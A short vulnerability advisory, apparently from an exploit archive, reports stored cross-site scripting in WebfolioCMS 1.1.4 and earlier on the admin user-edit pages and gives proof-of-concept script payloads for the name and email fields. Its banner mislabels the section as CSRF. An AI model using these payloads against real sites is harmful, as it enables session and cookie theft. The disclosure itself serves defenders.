+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : WebfolioCMS <= 1.1.4 Multiple XSS # Date : 07-03-2012 # Author : Ivano Binetti (http://www.ivanobinetti.com) # Software link : http://sourceforge.net/projects/webfolio-cms/files/WebfolioCMS-1.1.4.zip/download # Vendor site : http://webfolio-cms.sourceforge.net/ # Version : 1.1.4 and lower # Tested on : Debian Squeeze (6.0) # Original Advisory: http://ivanobinetti.blogspot.com/2012/03/webfolio-114-multiple-xss.html +--------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------[CSRF Vulnerabilities by Ivano Binetti]-----------------------------------------------+ Summary 1)Introduction 2)Vulnerabilities Description 3)POC +--------------------------------------------------------------------------------------------------------------------------------+ 1)Introduction Webfolio CMS "is a free, open-source, customized content management system, whose main purpose is creation of web sites for presenting someone's work, and portfolio-like websites". 2)Vulnerabilities Description WebfolioCMS 1.1.4 (and lower) is prone to multiple XSS vulnerabilities in "webfolio/admin/users/edit/<used_id>" pages - where <used_id> = 1....n - due to an improper input sanitization. 3)POC To exploit "First name" and "Last name" fields: <script>alert(document.cookie)</script> To exploit "Email (required)" field: email@email.com"><script>alert(document.cookie)</script> +--------------------------------------------------------------------------------------------------------------------------------+